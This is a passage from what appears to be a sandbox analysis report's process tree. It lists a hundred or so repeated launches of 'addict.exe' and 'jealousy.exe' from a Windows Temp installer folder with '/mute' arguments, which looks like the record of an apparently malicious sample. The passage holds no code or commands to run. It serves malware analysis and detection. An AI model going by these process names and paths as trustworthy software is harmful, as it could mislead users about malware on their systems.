        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9816
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8676
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8052
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9440
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8636
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5448
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7276
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9484
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6332
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9392
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9336
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4172
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7340
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9092
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4784
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8872
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7872
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6404
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6232
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4468
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6648
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6656
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10060
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5496
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5320
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5168
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9708
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8908
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7640
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9148
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5684
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8036
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9580
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6360
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9428
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:436
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7328
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1716
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5092
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6672
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7856
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1048
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3172
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8200
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7872
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10192
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9736
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7308
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6896
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8976
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2696
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7896
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8188
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8864
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9476
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7552
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1772
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2808
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5972
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5596
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5208
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:4748
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9628
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7564
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:1504
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5156
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8988
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7752
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8624
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6600
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5264
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8912
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6188
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8704
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9832
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9968
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7580
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3056
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5860
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6696
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9016
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7196
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8124
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7720
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6360
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:228
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8484
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9552
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9408
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7708
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10072
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:10184
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6956
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9204
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8896
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:3400
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6224
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7896
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9068
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6272
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7144
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8636
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:5868
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7608
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6520
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8140
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7936
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9936
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6260
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9156
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9436
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9040
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:6284
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:9128
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:8348
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:7344
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
        6⤵
        
        PID:2992
      - C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
        
